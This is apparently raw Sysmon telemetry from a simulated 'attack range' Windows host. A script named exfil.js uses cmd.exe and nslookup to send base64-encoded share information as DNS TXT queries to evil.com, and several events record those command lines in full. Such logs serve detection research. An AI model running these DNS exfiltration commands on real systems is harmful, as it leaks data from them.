10341000x8000000000000000213194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.173{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6245-000000005F02}6560C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.173{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-6245-000000005F02}6560C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.173{2E1864BB-18F8-629A-6245-000000005F02}65607208C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6145-000000005F02}6928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.173{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6245-000000005F02}6560C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6145-000000005F02}6928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-18E0-629A-6742-000000005F02}39766180C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-6145-000000005F02}6928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.170{2E1864BB-18F8-629A-6145-000000005F02}6928C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlruauw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.157{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlyuztl.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-18F8-629A-5F45-000000005F02}47803616C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-6045-000000005F02}7284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-6045-000000005F02}7284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.141{2E1864BB-18F8-629A-5E45-000000005F02}75687904C:\Windows\system32\cmd.exe{2E1864BB-18F8-629A-6045-000000005F02}7284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.143{2E1864BB-18F8-629A-6045-000000005F02}7284C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F8-629A-5E45-000000005F02}7568C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyuztl.tmp 2>&1 10341000x8000000000000000213174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.126{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-5F45-000000005F02}4780C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.126{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F8-629A-5F45-000000005F02}4780C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.110{2E1864BB-18F8-629A-5F45-000000005F02}47803616C:\Windows\system32\conhost.exe{2E1864BB-18F8-629A-5E45-000000005F02}7568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.110{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-5F45-000000005F02}4780C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F8-629A-5E45-000000005F02}7568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-18E0-629A-6742-000000005F02}39767552C:\Windows\System32\WScript.exe{2E1864BB-18F8-629A-5E45-000000005F02}7568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.102{2E1864BB-18F8-629A-5E45-000000005F02}7568C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyuztl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.094{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmeu.tmpMD5=1D1CCA53E4DF780302A6C1C8BFFFFD37,SHA256=3E9BA274CFCD18E7F9C724A3CED552A6AAA905F20D03820BE6FCA23A34DF3C9F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213162Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 